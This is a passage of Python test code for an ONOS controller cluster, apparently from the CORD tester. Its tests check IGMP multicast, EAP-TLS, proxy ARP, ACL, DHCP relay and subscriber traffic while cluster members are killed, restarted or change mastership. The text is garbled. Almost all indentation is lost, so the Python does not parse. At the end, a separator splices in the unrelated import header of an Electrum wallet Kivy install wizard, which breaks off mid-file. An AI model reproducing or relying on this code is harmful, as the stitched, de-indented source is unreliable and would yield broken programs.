assert_equal(len(standbys), (onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
master_onos_name = onos_names_ips[master]
self.igmp.setUp(controller=master)
groups = [self.igmp.random_mcast_ip()]
src_list = [self.igmp.randomsourceip()]
self.igmp.onos_ssm_table_load(groups, src_list=src_list,controller=master)
self.igmp.send_igmp_join(groups = [groups[0]], src_list = src_list,record_type = IGMP_V3_GR_TYPE_INCLUDE,
iface = self.V_INF1, delay = 2)
status = self.verify_igmp_data_traffic(groups[0],intf=self.V_INF1,source=src_list[0])
assert_equal(status,True)
        log_test.info('Killing cluster master %s'%master)
Container(master_onos_name,Onos.IMAGE).kill()
count = 0
for i in range(60):
log_test.info('Verifying multicast data traffic after cluster master down')
status = self.verify_igmp_data_traffic(groups[0],intf=self.V_INF1,source=src_list[0])
if status:
break
else:
count += 1
time.sleep(1)
assert_equal(status, True)
        log_test.info('Time taken to recover traffic after the cluster master went down is %d seconds'%count)
#pass
def test_cluster_state_with_igmp_leave_group_after_master_change(self, onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys), (onos_instances-1))
self.igmp.setUp(controller=master)
groups = [self.igmp.random_mcast_ip()]
src_list = [self.igmp.randomsourceip()]
self.igmp.onos_ssm_table_load(groups, src_list=src_list,controller=master)
self.igmp.send_igmp_join(groups = [groups[0]], src_list = src_list,record_type = IGMP_V3_GR_TYPE_INCLUDE,
iface = self.V_INF1, delay = 2)
status = self.verify_igmp_data_traffic(groups[0],intf=self.V_INF1,source=src_list[0])
assert_equal(status,True)
log_test.info('Changing cluster master %s to %s'%(master,standbys[0]))
        self.change_master_current_cluster(new_master=standbys[0])
log_test.info('Verifying multicast traffic after cluster master change')
status = self.verify_igmp_data_traffic(groups[0],intf=self.V_INF1,source=src_list[0])
assert_equal(status,True)
log_test.info('Sending igmp TO_EXCLUDE message to leave the group %s'%groups[0])
self.igmp.send_igmp_join(groups = [groups[0]], src_list = src_list,record_type = IGMP_V3_GR_TYPE_CHANGE_TO_EXCLUDE,
iface = self.V_INF1, delay = 1)
time.sleep(10)
status = self.verify_igmp_data_traffic(groups[0],intf = self.V_INF1,source= src_list[0])
assert_equal(status,False)
#pass
def test_cluster_state_with_igmp_join_before_and_after_master_change(self,onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys), (onos_instances-1))
self.igmp.setUp(controller=master)
groups = [self.igmp.random_mcast_ip()]
src_list = [self.igmp.randomsourceip()]
self.igmp.onos_ssm_table_load(groups, src_list=src_list,controller=master)
log_test.info('Changing cluster master %s to %s'%(master,standbys[0]))
        self.change_master_current_cluster(new_master = standbys[0])
self.igmp.send_igmp_join(groups = [groups[0]], src_list = src_list,record_type = IGMP_V3_GR_TYPE_INCLUDE,
iface = self.V_INF1, delay = 2)
time.sleep(1)
        self.change_master_current_cluster(new_master = master)
status = self.verify_igmp_data_traffic(groups[0],intf=self.V_INF1,source=src_list[0])
assert_equal(status,True)
#pass
@deferred(TLS_TIMEOUT)
def test_cluster_with_eap_tls_traffic(self,onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys), (onos_instances-1))
self.tls.setUp(controller=master)
df = defer.Deferred()
def eap_tls_verify(df):
tls = TLSAuthTest()
tls.runTest()
df.callback(0)
reactor.callLater(0, eap_tls_verify, df)
return df
@deferred(120)
def test_cluster_for_eap_tls_traffic_before_and_after_master_change(self,onos_instances=ONOS_INSTANCES):
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys), (onos_instances-1))
self.tls.setUp()
df = defer.Deferred()
        def eap_tls_verify(df):
tls = TLSAuthTest()
tls.runTest()
df.callback(0)
for i in [0,1]:
if i == 1:
log_test.info('Changing cluster master %s to %s'%(master, standbys[0]))
self.change_master_current_cluster(new_master=standbys[0])
log_test.info('Verifying tls authentication after cluster master changed to %s'%standbys[0])
else:
log_test.info('Verifying tls authentication before cluster master change')
reactor.callLater(0, eap_tls_verify, df)
return df
@deferred(TLS_TIMEOUT)
def test_cluster_for_eap_tls_traffic_before_and_after_making_master_down(self,onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys), (onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
master_onos_name = onos_names_ips[master]
self.tls.setUp()
df = defer.Deferred()
def eap_tls_verify(df):
tls = TLSAuthTest()
tls.runTest()
df.callback(0)
for i in [0,1]:
if i == 1:
log_test.info('Killing cluster current master %s'%master)
cord_test_onos_shutdown(node = master)
time.sleep(20)
status = self.verify_cluster_status(controller=standbys[0],onos_instances=onos_instances-1,verify=True)
assert_equal(status, True)
log_test.info('Cluster came up with %d instances after killing master'%(onos_instances-1))
log_test.info('Verifying tls authentication after killing cluster master')
reactor.callLater(0, eap_tls_verify, df)
return df
@deferred(TLS_TIMEOUT)
def test_cluster_for_eap_tls_with_no_cert_before_and_after_member_is_restarted(self,onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys), (onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
member_onos_name = onos_names_ips[standbys[0]]
self.tls.setUp()
df = defer.Deferred()
def eap_tls_no_cert(df):
def tls_no_cert_cb():
log_test.info('TLS authentication failed with no certificate')
tls = TLSAuthTest(fail_cb = tls_no_cert_cb, client_cert = '')
tls.runTest()
assert_equal(tls.failTest, True)
df.callback(0)
for i in [0,1]:
if i == 1:
log_test.info('Restart cluster member %s'%standbys[0])
Container(member_onos_name,Onos.IMAGE).restart()
time.sleep(20)
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
log_test.info('Cluster came up with %d instances after member restart'%(onos_instances))
log_test.info('Verifying tls authentication after member restart')
reactor.callLater(0, eap_tls_no_cert, df)
return df
#pass
def test_cluster_proxyarp_master_change_and_app_deactivation(self,onos_instances=ONOS_INSTANCES,hosts = 3):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status,True)
master,standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
self.proxyarp.setUpClass()
ports_map, egress_map,hosts_config = self.proxyarp.proxyarp_config(hosts = hosts,controller=master)
ingress = hosts+1
for hostip, hostmac in hosts_config:
self.proxyarp.proxyarp_arpreply_verify(ingress,hostip,hostmac,PositiveTest = True)
time.sleep(1)
log_test.info('changing cluster current master from %s to %s'%(master,standbys[0]))
        self.change_master_current_cluster(new_master=standbys[0])
log_test.info('verifying proxyarp after master change')
for hostip, hostmac in hosts_config:
self.proxyarp.proxyarp_arpreply_verify(ingress,hostip,hostmac,PositiveTest = True)
time.sleep(1)
log_test.info('Deactivating proxyarp app and expecting proxyarp functionality not to work')
self.proxyarp.proxyarp_activate(deactivate = True,controller=standbys[0])
time.sleep(3)
for hostip, hostmac in hosts_config:
self.proxyarp.proxyarp_arpreply_verify(ingress,hostip,hostmac,PositiveTest = False)
time.sleep(1)
log_test.info('activating proxyarp app and expecting to get arp reply from ONOS')
self.proxyarp.proxyarp_activate(deactivate = False,controller=standbys[0])
time.sleep(3)
for hostip, hostmac in hosts_config:
self.proxyarp.proxyarp_arpreply_verify(ingress,hostip,hostmac,PositiveTest = True)
time.sleep(1)
#pass
def test_cluster_with_proxyarp_and_one_member_down(self,hosts=3,onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys), (onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
member_onos_name = onos_names_ips[standbys[1]]
self.proxyarp.setUpClass()
ports_map, egress_map,hosts_config = self.proxyarp.proxyarp_config(hosts = hosts,controller=master)
ingress = hosts+1
for hostip, hostmac in hosts_config:
self.proxyarp.proxyarp_arpreply_verify(ingress,hostip,hostmac,PositiveTest = True)
time.sleep(1)
log_test.info('killing cluster member %s'%standbys[1])
Container(member_onos_name,Onos.IMAGE).kill()
time.sleep(20)
status = self.verify_cluster_status(onos_instances=onos_instances-1,controller=master,verify=True)
assert_equal(status, True)
log_test.info('cluster came up with %d instances after member down'%(onos_instances-1))
log_test.info('verifying proxy arp functionality after cluster member down')
for hostip, hostmac in hosts_config:
self.proxyarp.proxyarp_arpreply_verify(ingress,hostip,hostmac,PositiveTest = True)
time.sleep(1)
#pass
def test_cluster_with_proxyarp_and_concurrent_requests_with_multiple_host_and_different_interfaces(self,hosts=10,onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
self.proxyarp.setUpClass()
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys), (onos_instances-1))
ports_map, egress_map, hosts_config = self.proxyarp.proxyarp_config(hosts = hosts, controller=master)
self.success = True
ingress = hosts+1
ports = range(ingress,ingress+10)
hostmac = []
hostip = []
for ip,mac in hosts_config:
hostmac.append(mac)
hostip.append(ip)
success_dir = {}
def verify_proxyarp(*r):
ingress, hostmac, hostip = r[0],r[1],r[2]
def mac_recv_task():
def recv_cb(pkt):
log_test.info('Arp Reply seen with source Mac is %s' %(pkt[ARP].hwsrc))
success_dir[current_thread().name] = True
sniff(count=1, timeout=5,lfilter = lambda p: ARP in p and p[ARP].op == 2 and p[ARP].hwsrc == hostmac,
prn = recv_cb, iface = self.proxyarp.port_map[ingress])
t = threading.Thread(target = mac_recv_task)
t.start()
pkt = (Ether(dst = 'ff:ff:ff:ff:ff:ff')/ARP(op=1,pdst= hostip))
log_test.info('Sending arp request for dest ip %s on interface %s' %
(hostip,self.proxyarp.port_map[ingress]))
sendp(pkt, count = 10,iface = self.proxyarp.port_map[ingress])
t.join()
t = []
for i in range(10):
t.append(threading.Thread(target = verify_proxyarp, args = [ports[i],hostmac[i],hostip[i]]))
for i in range(10):
t[i].start()
time.sleep(2)
for i in range(10):
t[i].join()
if len(success_dir) != 10:
self.success = False
assert_equal(self.success, True)
#pass
def test_cluster_with_acl_rule_before_master_change_and_remove_acl_rule_after_master_change(self,onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
self.acl.setUp()
acl_rule = ACLTest()
status,code = acl_rule.adding_acl_rule('v4', srcIp=self.acl.ACL_SRC_IP, dstIp =self.acl.ACL_DST_IP, action = 'allow',controller=master)
if status is False:
log_test.info('JSON request returned status %d' %code)
assert_equal(status, True)
result = acl_rule.get_acl_rules(controller=master)
aclRules1 = result.json()['aclRules']
log_test.info('Added acl rules is %s'%aclRules1)
acl_Id = map(lambda d: d['id'], aclRules1)
log_test.info('Changing cluster current master from %s to %s'%(master,standbys[0]))
        self.change_master_current_cluster(new_master=standbys[0])
status,code = acl_rule.remove_acl_rule(acl_Id[0],controller=standbys[0])
if status is False:
log_test.info('JSON request returned status %d' %code)
assert_equal(status, True)
#pass
def test_cluster_verifying_acl_rule_in_new_master_after_current_master_is_down(self,onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
master_onos_name = onos_names_ips[master]
self.acl.setUp()
acl_rule = ACLTest()
status,code = acl_rule.adding_acl_rule('v4', srcIp=self.acl.ACL_SRC_IP, dstIp =self.acl.ACL_DST_IP, action = 'allow',controller=master)
if status is False:
log_test.info('JSON request returned status %d' %code)
assert_equal(status, True)
result1 = acl_rule.get_acl_rules(controller=master)
aclRules1 = result1.json()['aclRules']
log_test.info('Added acl rules is %s'%aclRules1)
acl_Id1 = map(lambda d: d['id'], aclRules1)
log_test.info('Killing cluster current master %s'%master)
Container(master_onos_name,Onos.IMAGE).kill()
time.sleep(45)
status = self.verify_cluster_status(onos_instances=onos_instances,controller=standbys[0])
assert_equal(status, True)
new_master,standbys = self.get_cluster_current_master_standbys(controller=standbys[0])
assert_equal(len(standbys),(onos_instances-2))
assert_not_equal(new_master,master)
result2 = acl_rule.get_acl_rules(controller=new_master)
aclRules2 = result2.json()['aclRules']
acl_Id2 = map(lambda d: d['id'], aclRules2)
log_test.info('Acl Ids before and after master down are %s and %s'%(acl_Id1,acl_Id2))
assert_equal(acl_Id2,acl_Id1)
#acl traffic scenario not working as acl rule is not getting added to onos
def test_cluster_with_acl_traffic_before_and_after_two_members_down(self,onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
member1_onos_name = onos_names_ips[standbys[0]]
member2_onos_name = onos_names_ips[standbys[1]]
ingress = self.acl.ingress_iface
egress = self.acl.CURRENT_PORT_NUM
acl_rule = ACLTest()
status, code, host_ip_mac = acl_rule.generate_onos_interface_config(iface_num= self.acl.CURRENT_PORT_NUM, iface_name = 'b1',iface_count = 1, iface_ip = self.acl.HOST_DST_IP)
self.acl.CURRENT_PORT_NUM += 1
time.sleep(5)
if status is False:
log_test.info('JSON request returned status %d' %code)
assert_equal(status, True)
srcMac = '00:00:00:00:00:11'
dstMac = host_ip_mac[0][1]
self.acl.acl_hosts_add(dstHostIpMac = host_ip_mac, egress_iface_count = 1, egress_iface_num = egress )
status, code = acl_rule.adding_acl_rule('v4', srcIp=self.acl.ACL_SRC_IP, dstIp =self.acl.ACL_DST_IP, action = 'deny',controller=master)
time.sleep(10)
if status is False:
log_test.info('JSON request returned status %d' %code)
assert_equal(status, True)
self.acl.acl_rule_traffic_send_recv(srcMac = srcMac, dstMac = dstMac ,srcIp =self.acl.ACL_SRC_IP, dstIp = self.acl.ACL_DST_IP,ingress =ingress, egress = egress, ip_proto = 'UDP', positive_test = False)
log_test.info('killing cluster members %s and %s'%(standbys[0],standbys[1]))
Container(member1_onos_name, Onos.IMAGE).kill()
Container(member2_onos_name, Onos.IMAGE).kill()
time.sleep(40)
status = self.verify_cluster_status(onos_instances=onos_instances-2,verify=True,controller=master)
assert_equal(status, True)
self.acl.acl_rule_traffic_send_recv(srcMac = srcMac, dstMac = dstMac ,srcIp =self.acl.ACL_SRC_IP, dstIp = self.acl.ACL_DST_IP,ingress =ingress, egress = egress, ip_proto = 'UDP', positive_test = False)
self.acl.acl_hosts_remove(egress_iface_count = 1, egress_iface_num = egress)
#pass
def test_cluster_with_dhcpRelay_releasing_dhcp_ip_after_master_change(self, iface = 'veth0',onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
self.dhcprelay.setUpClass(controller=master)
mac = self.dhcprelay.get_mac(iface)
self.dhcprelay.host_load(iface)
        ##we use the defaults for this test, which serves as an example for others
        ##you don't need to restart the dhcpd server if you retain the default config
config = self.dhcprelay.default_config
options = self.dhcprelay.default_options
subnet = self.dhcprelay.default_subnet_config
dhcpd_interface_list = self.dhcprelay.relay_interfaces
self.dhcprelay.dhcpd_start(intf_list = dhcpd_interface_list,
config = config,
options = options,
subnet = subnet,
controller=master)
self.dhcprelay.dhcp = DHCPTest(seed_ip = '10.10.100.10', iface = iface)
cip, sip = self.dhcprelay.send_recv(mac)
log_test.info('Changing cluster current master from %s to %s'%(master, standbys[0]))
self.change_master_current_cluster(new_master=standbys[0])
log_test.info('Releasing ip %s to server %s' %(cip, sip))
assert_equal(self.dhcprelay.dhcp.release(cip), True)
log_test.info('Triggering DHCP discover again after release')
cip2, sip2 = self.dhcprelay.send_recv(mac)
log_test.info('Verifying released IP was given back on rediscover')
assert_equal(cip, cip2)
log_test.info('Test done. Releasing ip %s to server %s' %(cip2, sip2))
assert_equal(self.dhcprelay.dhcp.release(cip2), True)
self.dhcprelay.tearDownClass(controller=standbys[0])
def test_cluster_with_dhcpRelay_and_verify_dhcp_ip_after_master_down(self, iface = 'veth0',onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
master_onos_name = onos_names_ips[master]
self.dhcprelay.setUpClass(controller=master)
mac = self.dhcprelay.get_mac(iface)
self.dhcprelay.host_load(iface)
##We use the defaults for this test; it serves as an example for the others.
##You don't need to restart the dhcpd server if you retain the default config.
config = self.dhcprelay.default_config
options = self.dhcprelay.default_options
subnet = self.dhcprelay.default_subnet_config
dhcpd_interface_list = self.dhcprelay.relay_interfaces
self.dhcprelay.dhcpd_start(intf_list = dhcpd_interface_list,
config = config,
options = options,
subnet = subnet,
controller=master)
self.dhcprelay.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
log_test.info('Initiating dhcp process from client %s'%mac)
cip, sip = self.dhcprelay.send_recv(mac)
log_test.info('Killing cluster current master %s'%master)
Container(master_onos_name, Onos.IMAGE).kill()
time.sleep(60)
status = self.verify_cluster_status(onos_instances=onos_instances-1,verify=True,controller=standbys[0])
assert_equal(status, True)
mac = self.dhcprelay.dhcp.get_mac(cip)[0]
log_test.info("Verifying dhcp clients gets same IP after cluster master restarts")
new_cip, new_sip = self.dhcprelay.dhcp.only_request(cip, mac)
assert_equal(new_cip, cip)
self.dhcprelay.tearDownClass(controller=standbys[0])
#pass
def test_cluster_with_dhcpRelay_and_simulate_client_by_changing_master(self, iface = 'veth0',onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
self.dhcprelay.setUpClass(controller=master)
macs = ['e4:90:5e:a3:82:c1','e4:90:5e:a3:82:c2','e4:90:5e:a3:82:c3']
self.dhcprelay.host_load(iface)
##We use the defaults for this test; it serves as an example for the others.
##You don't need to restart the dhcpd server if you retain the default config.
config = self.dhcprelay.default_config
options = self.dhcprelay.default_options
subnet = self.dhcprelay.default_subnet_config
dhcpd_interface_list = self.dhcprelay.relay_interfaces
self.dhcprelay.dhcpd_start(intf_list = dhcpd_interface_list,
config = config,
options = options,
subnet = subnet,
controller=master)
self.dhcprelay.dhcp = DHCPTest(seed_ip = '10.10.10.1', iface = iface)
cip1, sip1 = self.dhcprelay.send_recv(macs[0])
assert_not_equal(cip1,None)
log_test.info('Got dhcp client IP %s for mac %s when cluster master is %s'%(cip1,macs[0],master))
log_test.info('Changing cluster master from %s to %s'%(master, standbys[0]))
self.change_master_current_cluster(new_master=standbys[0])
cip2, sip2 = self.dhcprelay.send_recv(macs[1])
assert_not_equal(cip2,None)
log_test.info('Got dhcp client IP %s for mac %s when cluster master is %s'%(cip2,macs[1],standbys[0]))
log_test.info('Changing cluster master from %s to %s'%(standbys[0],master))
self.change_master_current_cluster(new_master=master)
cip3, sip3 = self.dhcprelay.send_recv(macs[2])
assert_not_equal(cip3,None)
log_test.info('Got dhcp client IP %s for mac %s when cluster master is %s'%(cip3,macs[2],master))
self.dhcprelay.tearDownClass(controller=standbys[0])
def test_cluster_with_cord_subscriber_joining_next_channel_before_and_after_cluster_restart(self,onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys()
self.subscriber.setUpClass(controller=master)
self.subscriber.num_subscribers = 5
self.subscriber.num_channels = 10
for i in [0,1]:
if i == 1:
cord_test_onos_restart()
time.sleep(45)
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
log_test.info('Verifying cord subscriber functionality after cluster restart')
else:
log_test.info('Verifying cord subscriber functionality before cluster restart')
test_status = self.subscriber.subscriber_join_verify(num_subscribers = self.subscriber.num_subscribers,
num_channels = self.subscriber.num_channels,
cbs = (self.subscriber.tls_verify, self.subscriber.dhcp_next_verify,
self.subscriber.igmp_next_verify, self.subscriber.traffic_verify),
port_list = self.subscriber.generate_port_list(self.subscriber.num_subscribers,
self.subscriber.num_channels))
assert_equal(test_status, True)
self.subscriber.tearDownClass(controller=master)
#not validated on cluster setup because ciena-cordigmp-multitable-2.0 app installation fails on cluster
def test_cluster_with_cord_subscriber_join_next_channel_before_and_after_cluster_mastership_is_withdrawn(self,onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
self.subscriber.setUpClass(controller=master)
self.subscriber.num_subscribers = 5
self.subscriber.num_channels = 10
for i in [0,1]:
if i == 1:
status=self.withdraw_cluster_current_mastership(master_ip=master)
assert_equal(status, True)
master,standbys = self.get_cluster_current_master_standbys()
log_test.info('verifying cord subscriber functionality after cluster current master withdraw mastership')
else:
log_test.info('verifying cord subscriber functionality before cluster master withdraw mastership')
test_status = self.subscriber.subscriber_join_verify(num_subscribers = self.subscriber.num_subscribers,
num_channels = self.subscriber.num_channels,
cbs = (self.subscriber.tls_verify, self.subscriber.dhcp_next_verify,
self.subscriber.igmp_next_verify, self.subscriber.traffic_verify),
port_list = self.subscriber.generate_port_list(self.subscriber.num_subscribers,
self.subscriber.num_channels),controller=master)
assert_equal(test_status, True)
self.subscriber.tearDownClass(controller=master)
#not validated on cluster setup because ciena-cordigmp-multitable-2.0 app installation fails on cluster
def test_cluster_with_cord_subscriber_join_recv_traffic_from_10channels_and_making_one_cluster_member_down(self,onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
member_onos_name = onos_names_ips[standbys[0]]
self.subscriber.setUpClass(controller=master)
num_subscribers = 1
num_channels = 10
for i in [0,1]:
if i == 1:
cord_test_onos_shutdown(node = standbys[0])
time.sleep(30)
status = self.verify_cluster_status(onos_instances=onos_instances-1,verify=True,controller=master)
assert_equal(status, True)
log_test.info('Verifying cord subscriber functionality after cluster member %s is down'%standbys[0])
else:
log_test.info('Verifying cord subscriber functionality before cluster member %s is down'%standbys[0])
test_status = self.subscriber.subscriber_join_verify(num_subscribers = num_subscribers,
num_channels = num_channels,
cbs = (self.subscriber.tls_verify, self.subscriber.dhcp_verify,
self.subscriber.igmp_verify, self.subscriber.traffic_verify),
port_list = self.subscriber.generate_port_list(num_subscribers, num_channels),
negative_subscriber_auth = 'all',controller=master)
assert_equal(test_status, True)
self.subscriber.tearDownClass(controller=master)
def test_cluster_with_cord_subscriber_joining_next_10channels_making_two_cluster_members_down(self,onos_instances=ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master, standbys = self.get_cluster_current_master_standbys()
assert_equal(len(standbys),(onos_instances-1))
onos_names_ips = self.get_cluster_container_names_ips()
member1_onos_name = onos_names_ips[standbys[0]]
member2_onos_name = onos_names_ips[standbys[1]]
self.subscriber.setUpClass(controller=master)
num_subscribers = 1
num_channels = 10
for i in [0,1]:
if i == 1:
cord_test_onos_shutdown(node = standbys[0])
cord_test_onos_shutdown(node = standbys[1])
time.sleep(60)
status = self.verify_cluster_status(onos_instances=onos_instances-2)
assert_equal(status, True)
log_test.info('Verifying cord subscriber functionality after cluster two members %s and %s are down'%(standbys[0],standbys[1]))
else:
log_test.info('Verifying cord subscriber functionality before cluster two members %s and %s are down'%(standbys[0],standbys[1]))
test_status = self.subscriber.subscriber_join_verify(num_subscribers = num_subscribers,
num_channels = num_channels,
cbs = (self.subscriber.tls_verify, self.subscriber.dhcp_next_verify,
self.subscriber.igmp_next_verify, self.subscriber.traffic_verify),
port_list = self.subscriber.generate_port_list(num_subscribers, num_channels),
negative_subscriber_auth = 'all')
assert_equal(test_status, True)
self.subscriber.tearDownClass(controller=master)
#pass
def test_cluster_with_multiple_ovs_switches(self,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
device_dict = self.get_cluster_current_master_standbys_of_connected_devices()
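#Note: device_dict (as used below) maps each connected device id to its current 'master' controller and the list of 'standbys'.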
for device in device_dict.keys():
log_test.info("Device is %s"%device_dict[device])
assert_not_equal(device_dict[device]['master'],'none')
log_test.info('Master and standbys for device %s are %s and %s'%(device,device_dict[device]['master'],device_dict[device]['standbys']))
assert_equal(len(device_dict[device]['standbys']), onos_instances-1)
#pass
def test_cluster_state_in_multiple_ovs_switches(self,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
device_dict = self.get_cluster_current_master_standbys_of_connected_devices()
cluster_ips = self.get_cluster_current_member_ips()
for ip in cluster_ips:
device_dict= self.get_cluster_current_master_standbys_of_connected_devices(controller = ip)
assert_equal(len(device_dict.keys()),onos_instances)
for device in device_dict.keys():
log_test.info("Device is %s"%device_dict[device])
assert_not_equal(device_dict[device]['master'],'none')
log_test.info('Master and standbys for device %s are %s and %s'%(device,device_dict[device]['master'],device_dict[device]['standbys']))
assert_equal(len(device_dict[device]['standbys']), onos_instances-1)
#pass
def test_cluster_verifying_multiple_ovs_switches_after_master_is_restarted(self,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
onos_names_ips = self.get_cluster_container_names_ips()
master_count = self.get_number_of_devices_of_master()
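#Note: master_count (as used below) maps each controller IP to the devices it currently masters; 'size' is the device count and 'devices' holds their ids.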
log_test.info('Master count information is %s'%master_count)
total_devices = 0
for master in master_count.keys():
total_devices += master_count[master]['size']
if master_count[master]['size'] != 0:
restart_ip = master
assert_equal(total_devices,onos_instances)
member_onos_name = onos_names_ips[restart_ip]
log_test.info('Restarting cluster member %s having ip %s'%(member_onos_name,restart_ip))
Container(member_onos_name, Onos.IMAGE).restart()
time.sleep(40)
master_count = self.get_number_of_devices_of_master()
log_test.info('Master count information after restart is %s'%master_count)
total_devices = 0
for master in master_count.keys():
total_devices += master_count[master]['size']
if master == restart_ip:
assert_equal(master_count[master]['size'], 0)
assert_equal(total_devices,onos_instances)
#pass
def test_cluster_verifying_multiple_ovs_switches_with_one_master_down(self,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
onos_names_ips = self.get_cluster_container_names_ips()
master_count = self.get_number_of_devices_of_master()
log_test.info('Master count information is %s'%master_count)
total_devices = 0
for master in master_count.keys():
total_devices += master_count[master]['size']
if master_count[master]['size'] != 0:
restart_ip = master
assert_equal(total_devices,onos_instances)
master_onos_name = onos_names_ips[restart_ip]
log_test.info('Shutting down cluster member %s having ip %s'%(master_onos_name,restart_ip))
Container(master_onos_name, Onos.IMAGE).kill()
time.sleep(40)
for ip in onos_names_ips.keys():
if ip != restart_ip:
controller_ip = ip
status = self.verify_cluster_status(onos_instances=onos_instances-1,controller=controller_ip)
assert_equal(status, True)
master_count = self.get_number_of_devices_of_master(controller=controller_ip)
log_test.info('Master count information after restart is %s'%master_count)
total_devices = 0
for master in master_count.keys():
total_devices += master_count[master]['size']
if master == restart_ip:
assert_equal(master_count[master]['size'], 0)
assert_equal(total_devices,onos_instances)
#pass
def test_cluster_verifying_multiple_ovs_switches_with_current_master_withdrawing_mastership(self,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master_count = self.get_number_of_devices_of_master()
log_test.info('Master count information is %s'%master_count)
total_devices = 0
for master in master_count.keys():
total_devices += int(master_count[master]['size'])
if master_count[master]['size'] != 0:
master_ip = master
log_test.info('Devices of master %s are %s'%(master,master_count[master]['devices']))
device_id = str(master_count[master]['devices'][0])
device_count = master_count[master]['size']
assert_equal(total_devices,onos_instances)
log_test.info('Withdrawing mastership of device %s for controller %s'%(device_id,master_ip))
status=self.withdraw_cluster_current_mastership(master_ip=master_ip,device_id = device_id)
assert_equal(status, True)
master_count = self.get_number_of_devices_of_master()
log_test.info('Master count information after cluster mastership withdraw is %s'%master_count)
total_devices = 0
for master in master_count.keys():
total_devices += int(master_count[master]['size'])
if master == master_ip:
assert_equal(master_count[master]['size'], device_count-1)
assert_equal(total_devices,onos_instances)
#pass
def test_cluster_verifying_multiple_ovs_switches_and_restarting_cluster(self,onos_instances = ONOS_INSTANCES):
status = self.verify_cluster_status(onos_instances=onos_instances)
assert_equal(status, True)
master_count = self.get_number_of_devices_of_master()
log_test.info('Master count information is %s'%master_count)
total_devices = 0
for master in master_count.keys():
total_devices += master_count[master]['size']
assert_equal(total_devices,onos_instances)
log_test.info('Restarting cluster')
cord_test_onos_restart()
time.sleep(60)
master_count = self.get_number_of_devices_of_master()
log_test.info('Master count information after restart is %s'%master_count)
total_devices = 0
for master in master_count.keys():
total_devices += master_count[master]['size']
assert_equal(total_devices,onos_instances)
|
installwizard.py
|
from functools import partial
import threading
from kivy.app import App
from kivy.clock import Clock
from kivy.lang import Builder
from kivy.properties import ObjectProperty, StringProperty, OptionProperty
from kivy.core.window import Window
from kivy.uix.button import Button
from kivy.utils import platform
from kivy.uix.widget import Widget
from electrum.base_wizard import BaseWizard
from . import EventsDialog
from ...i18n import _
from .password_dialog import PasswordDialog
# global Variables
